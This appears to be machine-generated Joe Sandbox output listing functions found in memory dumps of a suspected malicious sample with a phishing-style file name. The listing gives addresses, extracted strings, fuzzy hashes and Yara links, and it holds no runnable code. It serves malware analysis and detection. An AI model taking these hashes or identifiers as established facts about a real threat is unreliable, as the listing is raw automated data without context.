Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (_p$,DR$Plp$$p
API String ID: 0-4090216785
Opcode ID: 45bb6f30e49beb96c40bc6c84fe30b0973ac7b0f46de0c09ca1bf4a61f90846e
Instruction ID: 61fc9c046cc48cb09b9738002d8df0c54ba17a417bd99f79643d9fc81b3d0bca
Opcode Fuzzy Hash: 45bb6f30e49beb96c40bc6c84fe30b0973ac7b0f46de0c09ca1bf4a61f90846e
Instruction Fuzzy Hash: 6D424934B406058FDB18DF28C894AAEBBE3AF85310F6584A9D446CB3B5DB35EC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00614DF8 Relevance: 2.0, Strings: 1, Instructions: 767COMMON

Download Yara Rule

Strings

(p, xrefs: 00615108

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: e036d4a049212d8bb944be5bd7b694f27ec839cd34787662bce6bc07d8d8ad9f
Instruction ID: 2eb46e187bd2b7c7517f9a34cbe328752562a526647371671a0257ec7876e30b
Opcode Fuzzy Hash: e036d4a049212d8bb944be5bd7b694f27ec839cd34787662bce6bc07d8d8ad9f
Instruction Fuzzy Hash: D7528974A007159FCB15CF68C894AAEFBF2FF88300F28852AD556D7391DB34A946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04EFAEC8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d92ea14b3a84b557c8cc32847594a0edbe4fc6e6fab1748175df01e6540dfc7
Instruction ID: 7e2727a00c72359118302481b83bc27ed1684b6b63279e5ebefb17bcede355a1
Opcode Fuzzy Hash: 9d92ea14b3a84b557c8cc32847594a0edbe4fc6e6fab1748175df01e6540dfc7
Instruction Fuzzy Hash: 7D916831B04205CFEB14DF66E898BADB7B2FB88305F29D0B5D505AB298D734B985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004F3BD7 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f375bf42e16f1f49646891cfee39240d0e9bf4555824a508ad2f9b0925f5c3f
Instruction ID: 0b54aacdf9511fff9fc89879febb290915444d79b7786a9a1fcacf6ebae238dd
Opcode Fuzzy Hash: 4f375bf42e16f1f49646891cfee39240d0e9bf4555824a508ad2f9b0925f5c3f
Instruction Fuzzy Hash: 7F6101347017460BD7662A7598A437F6AA79FE6701F0C443FE602C73D2CEBC8E466289

Uniqueness

Uniqueness Score: -1.00%

Function 004F3BF8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154d38b4280c93ff2383cd52d34ef2a2d971ab2ac95101e532df372351f884a6
Instruction ID: 2df2132f90b784e5cf74411223f9741f801f918db2f10557a0755f38bfde7407
Opcode Fuzzy Hash: 154d38b4280c93ff2383cd52d34ef2a2d971ab2ac95101e532df372351f884a6
Instruction Fuzzy Hash: B351F135701A0607D7692A6598A437FA5979FE5702F0C443EEB02973D2CEBD8E862289

Uniqueness

Uniqueness Score: -1.00%

Function 04EF5DC0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e78dd6c0543a4c215b9a6b917e1844b2f5846c243edc5a7004606b4f15ffa38
Instruction ID: 2244c9c227bbbe0c54bcb6c6ca74aef3701b862395dc344462832be52ecfba0f
Opcode Fuzzy Hash: 9e78dd6c0543a4c215b9a6b917e1844b2f5846c243edc5a7004606b4f15ffa38
Instruction Fuzzy Hash: 5F914B70A05248DFCB44EFA9E859BAEB7F1FF48304F5084A9D4069B395DB35AA85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00619958 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3340ffeb2922667babc29a444d22793c9b65d89e2a60005c3a58ea535fec51e1
Instruction ID: 40c0d5f1c3c3d4be7c8096072ae14681d15ccc97e4f693e8207cc755920cb827
Opcode Fuzzy Hash: 3340ffeb2922667babc29a444d22793c9b65d89e2a60005c3a58ea535fec51e1
Instruction Fuzzy Hash: 23617230A08204CFDB14EB95E965BEAB7B3FB88305F28C169D4015B399C7759DC5CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007DDBB0 Relevance: 8.1, Strings: 6, Instructions: 628
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p, xrefs: 007DE250
PHp, xrefs: 007DE154
Hp, xrefs: 007DDE64
(p, xrefs: 007DDC02
PHp, xrefs: 007DE142
h~, xrefs: 007DDCE4

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Hp$(p$PHp$PHp$h~$p
API String ID: 0-1182827755
Opcode ID: 254443b31bd5f2e68b2d06c954648c38a25bc9128da257b385084f1fefdf1582
Instruction ID: cad0aea5e4cfac0accc57f3b35e554c07b02d0dfac5a8efdaecc7d60969fccdc
Opcode Fuzzy Hash: 254443b31bd5f2e68b2d06c954648c38a25bc9128da257b385084f1fefdf1582
Instruction Fuzzy Hash: 3032A130B007458FC725DB78C450BAEBBB2AF89314F24896ED4069B396DB75EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0060AD80 Relevance: 6.7, Strings: 5, Instructions: 482
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LER, xrefs: 0060B368
Hp, xrefs: 0060B284
,DR, xrefs: 0060B188
Hp, xrefs: 0060B2D4
Hp, xrefs: 0060B255

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,DR$Hp$Hp$Hp$LER
API String ID: 0-1093185528
Opcode ID: 8ff5c5a88d332ffbace57a14921006830ab6cf9e3e1d03e69f68b3a789200ed2
Instruction ID: 6fbe3b877cd19cb5145b9d68054b71a241422c3b35942ac3d35f9da0d441520e
Opcode Fuzzy Hash: 8ff5c5a88d332ffbace57a14921006830ab6cf9e3e1d03e69f68b3a789200ed2
Instruction Fuzzy Hash: 5D125F31A007059FCB29DFA4D854AAEBBF2FF89300B14856DE4069B395DB31ED46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0061095F Relevance: 6.6, Strings: 5, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(p, xrefs: 00610A99
,DR, xrefs: 00610A16
,DR, xrefs: 0061099F
Hp, xrefs: 00610AF1
(p, xrefs: 00610AC5

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$(p$,DR$,DR$Hp
API String ID: 0-2723858098
Opcode ID: e721490977d57e82f927a59daf252f1e11531dc60d4aa55df59ea2065d8d4a25
Instruction ID: cab461bace3af826199b94d6d0864d5b84cf2316d9104961d4d59a386227c26d
Opcode Fuzzy Hash: e721490977d57e82f927a59daf252f1e11531dc60d4aa55df59ea2065d8d4a25
Instruction Fuzzy Hash: CCF14234A00209DFCB19DF64E4959DEBBB2FF89300F158569E405AB3A5DB30EC86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00617F30 Relevance: 6.6, Strings: 5, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hp, xrefs: 0061800B
(p, xrefs: 00618113
8xR, xrefs: 0061826C
(p, xrefs: 00618218
(p, xrefs: 00617FDF

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$(p$(p$8xR$Hp
API String ID: 0-647865385
Opcode ID: 87caf3ba1078b5a2a07a4fa7fb6f9ec972e3c142bab9024fdf707db251e28ab6
Instruction ID: e9ab877062df625116f7ec5b97a886b616f5227a0af081d0f8325e58257f141e
Opcode Fuzzy Hash: 87caf3ba1078b5a2a07a4fa7fb6f9ec972e3c142bab9024fdf707db251e28ab6
Instruction Fuzzy Hash: DB9114317047105FC7169B38A860AAF7FA3DFD6310B18856AE409CB396DE34DD0B87A6

Uniqueness

Uniqueness Score: -1.00%

Function 04DCF6A8 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 505
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 04DCF8C7

Strings

L<r, xrefs: 04DCFCF0
Tep, xrefs: 04DCFA78

Memory Dump Source

Source File: 00000002.00000002.433535704.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4dc0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: L<r$Tep
API String ID: 6842923-423740796
Opcode ID: d8bb5438fa0fecd31824ecd97738d394452ec8ac8983ffc8b7a24cfdef4ca00f
Instruction ID: 8af862d214b2c0214f91af1213be662a16f0c9d94768d53a409b63ef2671de07
Opcode Fuzzy Hash: d8bb5438fa0fecd31824ecd97738d394452ec8ac8983ffc8b7a24cfdef4ca00f
Instruction Fuzzy Hash: C0124830B102159FDB59EB78D5646ADBBE3AF88304B14892CE806DB395DF34ED46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0060C640 Relevance: 5.4, Strings: 4, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 0060C939
@;R, xrefs: 0060C9F1
4'p, xrefs: 0060C85A
4'p, xrefs: 0060C9B9

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p$4'p$4'p$@;R
API String ID: 0-2204238800
Opcode ID: 10c6b9130f39b3c85ff009fc8691e1c08acce227e3435e91f081f7ec024cf95e
Instruction ID: b564b32dd4264ab1288957f433b1ad2381a9ed3c2bb2e93c018a1f3208cdcfb9
Opcode Fuzzy Hash: 10c6b9130f39b3c85ff009fc8691e1c08acce227e3435e91f081f7ec024cf95e
Instruction Fuzzy Hash: C1F1EB34B50218CFCB19DFA4D999A9EB7B2FF89310F118159E506AB3A5DB70EC46CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0060A430 Relevance: 5.4, Strings: 4, Instructions: 351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(p, xrefs: 0060A444
d, xrefs: 0060A691
8xR, xrefs: 0060A7BD
8xR, xrefs: 0060A7B1

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$8xR$8xR$d
API String ID: 0-3719587894
Opcode ID: 6f131e8fda3a6f74f813cf81ad5ed03e5853f5ea223cda4ae139b86e9182fdea
Instruction ID: 154166324d1fde43e2083543916116233da6d10770d98a2ba64f55daf86f94c5
Opcode Fuzzy Hash: 6f131e8fda3a6f74f813cf81ad5ed03e5853f5ea223cda4ae139b86e9182fdea
Instruction Fuzzy Hash: 4AD16C346407018FCB19CF58C4849AABBF2FF89350B16C969D45A9B7A2DB31FC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00605CB1 Relevance: 5.2, Strings: 4, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hp, xrefs: 00605E55
,DR, xrefs: 00605D82
8xR, xrefs: 00605EE2
(p, xrefs: 00605DC6

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$,DR$8xR$Hp
API String ID: 0-567276277
Opcode ID: 4b8acfd6619daef38f269cb4ae3a11aaa2a777aeea61af5c17a8fcfb80e6a78e
Instruction ID: ffbc9eecfb9a596ad41ba42cff2373ab3822f2dab683f0894793dbdbf8135c2d
Opcode Fuzzy Hash: 4b8acfd6619daef38f269cb4ae3a11aaa2a777aeea61af5c17a8fcfb80e6a78e
Instruction Fuzzy Hash: DC61AE307447118FC729AB68D82466F7BA3AF96310724446EE406CB3E2CE35DC47CB92

Uniqueness

Uniqueness Score: -1.00%

Function 007DDCB0 Relevance: 4.1, Strings: 3, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hp, xrefs: 007DDE64
PHp, xrefs: 007DE142
h~, xrefs: 007DDCE4

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Hp$PHp$h~
API String ID: 0-176380224
Opcode ID: 0bcbe746f4676f53566d93fa28bd33e77c8920ee191385d77643cd1c1d62325c
Instruction ID: 8e93a34e56a194163be5de766a3afeebbcd1ed986e59e90c71eaa951cf56ecbb
Opcode Fuzzy Hash: 0bcbe746f4676f53566d93fa28bd33e77c8920ee191385d77643cd1c1d62325c
Instruction Fuzzy Hash: C2D15D30A00706DFD725DF79C440BAEB7B2AF88314F648A2AE4059B795DB75EC86CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00602A48 Relevance: 4.0, Strings: 3, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8xR, xrefs: 00602AA9
8xR, xrefs: 00602A9D
8xR, xrefs: 00602BF0

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 8xR$8xR$8xR
API String ID: 0-1689087184
Opcode ID: a5b2be6ae1cf2d747dc0cf78eaec082b9e06cbd4edcf69fb6c46f3fb1c51629c
Instruction ID: e497b7c5222f15da289e9039f9f455e48f860cf680179b18f30e3622d6437ee7
Opcode Fuzzy Hash: a5b2be6ae1cf2d747dc0cf78eaec082b9e06cbd4edcf69fb6c46f3fb1c51629c
Instruction Fuzzy Hash: E6A19F35B412059FCB19CF64D898AAEBBB2FF89311F24406AE811DB391CB35DD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0061D530 Relevance: 3.8, Strings: 3, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 0061D565
fp, xrefs: 0061D608
fp, xrefs: 0061D58A

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: fp$ fp$4'p
API String ID: 0-1404245427
Opcode ID: 154b6bfc3278295974b9d97f21010cabd37bf77a4a1bb3cd882f4ec5fad457f3
Instruction ID: fc260a74e76dd01f1e643153d44e6518960cb30d378a487c53f9a65f049be3e9
Opcode Fuzzy Hash: 154b6bfc3278295974b9d97f21010cabd37bf77a4a1bb3cd882f4ec5fad457f3
Instruction Fuzzy Hash: BE21E13090124ADFCB05EFA8D4516FDBBB2FF80300F54056AD006AB355DB30AE46DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0061D540 Relevance: 3.8, Strings: 3, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 0061D565
fp, xrefs: 0061D608
fp, xrefs: 0061D58A

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: fp$ fp$4'p
API String ID: 0-1404245427
Opcode ID: a1573db1939395a2ef7cec5e6ff1773e8bcbec3942574b62a257a6778b980f24
Instruction ID: a35caa2e550d85c23180e6f6f33cb1d11f7110d24328cc536ffc8e3fe07b2e36
Opcode Fuzzy Hash: a1573db1939395a2ef7cec5e6ff1773e8bcbec3942574b62a257a6778b980f24
Instruction Fuzzy Hash: 4A219D7091124A9FCB04EFA8D4516FDBBB3FF84304F54482AD416AB355DB30AE46DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004F1468 Relevance: 3.7, Strings: 2, Instructions: 1245COMMON

Download Yara Rule

Strings

4'p, xrefs: 004F2429
4'p, xrefs: 004F241D

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p$4'p
API String ID: 0-3973980265
Opcode ID: 2b7f7f4ec383e4fa0ee11b4c89d5dcddae20474538ff5507bced3531fa69990c
Instruction ID: 06441d88f6871641a655e0d72cddc8b7cfe1c43515d796346d3a41273832f312
Opcode Fuzzy Hash: 2b7f7f4ec383e4fa0ee11b4c89d5dcddae20474538ff5507bced3531fa69990c
Instruction Fuzzy Hash: 7582D830F01229CF8B391BB9551423F69D6AF96750F24552BCB02D73E8DE78CC0697AA

Uniqueness

Uniqueness Score: -1.00%

Function 007D0040 Relevance: 3.0, Strings: 2, Instructions: 541
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 007D0435
$p, xrefs: 007D0264

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 2$$p
API String ID: 0-255402429
Opcode ID: 6e8c6c32d9c34aa177c62b350702a1e4888240db736698e201e38957851c82c8
Instruction ID: 0f49bc6229f692d49c8ddb4a1173c256b9530146c2ce26e486d6569e0607e227
Opcode Fuzzy Hash: 6e8c6c32d9c34aa177c62b350702a1e4888240db736698e201e38957851c82c8
Instruction Fuzzy Hash: 80322D74A01205CFCB24DF68D895B5DBBB2BF88300F2094AAD40ADB766DB34AD45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 006066E8 Relevance: 3.0, Strings: 2, Instructions: 516COMMON

Download Yara Rule

Strings

$p, xrefs: 00606A63
$p, xrefs: 00606A53

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: $p$$p
API String ID: 0-580715581
Opcode ID: ef364518d17ac73e3dccb142ba41e9413b75f8328f0d92a02b9f19eee432ec70
Instruction ID: 03d4044b9cff2b35b0cc78072129e0240850748c10584326fb663bda8d7526ab
Opcode Fuzzy Hash: ef364518d17ac73e3dccb142ba41e9413b75f8328f0d92a02b9f19eee432ec70
Instruction Fuzzy Hash: 9F225D31A40229CFCB19DFA4D854AEEBBB2FF58301F148515E811A73E4DB74AE56CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00610280 Relevance: 2.9, Strings: 2, Instructions: 437COMMON

Download Yara Rule

Strings

\{R, xrefs: 00610582
\{R, xrefs: 00610693

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: \{R$\{R
API String ID: 0-1500987980
Opcode ID: f92275be6152e869fa71a88d602f1bd03e5d4df569c94ea7b62b23e27c76ef12
Instruction ID: fe2c3c3970779dd976f3402c6d149731af79749202e8daff586c9542907c9024
Opcode Fuzzy Hash: f92275be6152e869fa71a88d602f1bd03e5d4df569c94ea7b62b23e27c76ef12
Instruction Fuzzy Hash: 40120C34A002158FDB58EF64C894B9DB7B2BF89300F5485A9E549AB3A6DF70ED85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00612770 Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

4'p, xrefs: 00612A22
4'p, xrefs: 00612A50

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p$4'p
API String ID: 0-3973980265
Opcode ID: 012b106436c838991c20c67e3ffa1d8de1613113198280748454da0554359b56
Instruction ID: 1bd8768ef683137df8b5004fd0b350a2ab1ee54290fe26ddfd5a261e357cb8d7
Opcode Fuzzy Hash: 012b106436c838991c20c67e3ffa1d8de1613113198280748454da0554359b56
Instruction Fuzzy Hash: E3C1DC74B40218DFDB58EFA8C995A9EB7B2FF89300F104569E505AB3A5DB31EC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00618578 Relevance: 2.7, Strings: 2, Instructions: 236COMMON

Download Yara Rule

Strings

(p, xrefs: 00618878
(p, xrefs: 006186A0

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$(p
API String ID: 0-216383650
Opcode ID: 533ea28dc503fed572f372313debeb6a05e8230061e2a6cd64ed8996b2eaf96e
Instruction ID: 1c9388bd37f2db474817efcd59731d87db803e0ca93ba2130465280d752bb911
Opcode Fuzzy Hash: 533ea28dc503fed572f372313debeb6a05e8230061e2a6cd64ed8996b2eaf96e
Instruction Fuzzy Hash: D371F130A057509FC714CB38D854A9EBFE6FF86310B18855EE44ACB792DA30EC06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00611E32 Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

Hp, xrefs: 00611FFD
(p, xrefs: 00611FD1

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$Hp
API String ID: 0-3691929625
Opcode ID: f6f8e16fd0b0822c0709347c97280905f914e984a3422dac6e9fcc1d5b7ca11a
Instruction ID: 40825a694b3345d67676298c940f2567a3825e31132a117d9f725b8ba3b593e8
Opcode Fuzzy Hash: f6f8e16fd0b0822c0709347c97280905f914e984a3422dac6e9fcc1d5b7ca11a
Instruction Fuzzy Hash: 0461F1307007954FCB259B7894246EE7FE2AF82304B18456EE946CF396DA34DD47C792

Uniqueness

Uniqueness Score: -1.00%

Function 00611CA0 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

(p, xrefs: 00611D07
,p, xrefs: 00611CB0

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$,p
API String ID: 0-2293223000
Opcode ID: 6a0b5cddfe733ac3183af43a979624f22a3ae00aa14d9b4df85c6cf3ec447eca
Instruction ID: 3f12e10a408580a501f25905dd9c26852d621ccb75cca639cd4ef6375fa0692f
Opcode Fuzzy Hash: 6a0b5cddfe733ac3183af43a979624f22a3ae00aa14d9b4df85c6cf3ec447eca
Instruction Fuzzy Hash: CD41F6327041986FCF128EE9AC108FF7FEEAF89211B08406BFA15D7291C929CD1597B1

Uniqueness

Uniqueness Score: -1.00%

Function 004F37F0 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

4'p, xrefs: 004F3943
4'p, xrefs: 004F3937

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p$4'p
API String ID: 0-3973980265
Opcode ID: 6eaf63c39da6fa86135ad59371de081dedb39dc53ffe49fa3711e107e680288c
Instruction ID: 56bddce367837420cc537e563bf676f71974b13b724462beed85fbb6cda2bae1
Opcode Fuzzy Hash: 6eaf63c39da6fa86135ad59371de081dedb39dc53ffe49fa3711e107e680288c
Instruction Fuzzy Hash: 7D318030B04225474F697A34102117F15CB9FD1792719452FEA47DB385DF9C8E4253EA

Uniqueness

Uniqueness Score: -1.00%

Function 00601BB8 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

(p, xrefs: 00601C08
@)R, xrefs: 00601C52

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$@)R
API String ID: 0-1515272460
Opcode ID: 2321e94d89ca7bb04e8c3a62e7ebdd54057d177c32c2cde1c59d38d0b29a70fc
Instruction ID: 9edaabc4ece1522b3019c2b33218f7cdc47930166d48fb8cedcc9cb7496f2dae
Opcode Fuzzy Hash: 2321e94d89ca7bb04e8c3a62e7ebdd54057d177c32c2cde1c59d38d0b29a70fc
Instruction Fuzzy Hash: 762109357402516FDB095B68E844AAF7FA6EFCA320B15813AF909CB391CE718C06C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00603430 Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

p`p, xrefs: 00603486
p`p, xrefs: 00603492

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: p`p$p`p
API String ID: 0-2869643528
